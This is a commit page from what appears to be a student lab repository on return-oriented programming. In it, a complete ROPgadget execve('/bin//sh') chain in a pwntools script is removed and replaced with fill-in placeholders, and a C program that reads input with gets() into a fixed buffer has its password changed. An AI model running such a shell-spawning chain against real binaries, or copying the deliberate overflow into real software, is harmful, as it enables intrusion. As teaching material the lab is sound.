lucas.evard
/
ROP-TP
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

new repertory

Browse Source
rop2
Nicolas FRANCO 2 years ago
parent 5f0619125a
commit 78ab5f79ca
3 changed files with 13 additions and 83 deletions
Show Stats Download Patch File Download Diff File

93
tpattempt/pyscript
Unescape View File

@ -1,94 +1,23 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# execve generated by ROPgadget # execve generated by ROPgadget
from struct import pack
from pwn import * from pwn import *
# Padding goes here
p = b'' p = b''
r = process('./rop') r = process('./rop')
p += p64(0x00000000004077ce) # pop rsi ; ret # A COMPLETER
p += p64(0x00000000004b2000) # @ .data # A COMPLETER
p += p64(0x00000000004437e3) # pop rax ; ret # A COMPLETER
p += b'/bin//sh' # A COMPLETER
p += p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret # A COMPLETER
p += p64(0x00000000004077ce) # pop rsi ; ret # A COMPLETER
p += p64(0x00000000004b2008) # @ .data + 8 # A COMPLETER
p += p64(0x0000000000439720) # xor rax, rax ; ret # A COMPLETER
p += p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret # A COMPLETER
p += p64(0x00000000004017de) # pop rdi ; ret # A COMPLETER
p += p64(0x00000000004b2000) # @ .data # ...
p += p64(0x00000000004077ce) # pop rsi ; ret
p += p64(0x00000000004b2008) # @ .data + 8
p += p64(0x00000000004016fb) # pop rdx ; ret
p += p64(0x00000000004b2008) # @ .data + 8
p += p64(0x0000000000439720) # xor rax, rax ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x000000000040120b) # syscall
# print(p)
r.sendline(p) r.sendline(p)
r.interactive() r.interactive()

BIN
tpattempt/rop
View File

Binary file not shown.

3
tpattempt/vun.c
Unescape View File

@ -1,12 +1,13 @@
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
int main(int argc, char ** argv) { int main(int argc, char ** argv) {
char buff[128]; char buff[128];
gets(buff); gets(buff);
char *password = "I am h4cknd0"; char *password = "I am TP ROP PM 2 !";
if (strcmp(buff, password)) { if (strcmp(buff, password)) {
printf("You password is incorrect\n"); printf("You password is incorrect\n");

Write Preview
Loading…
Cancel
Save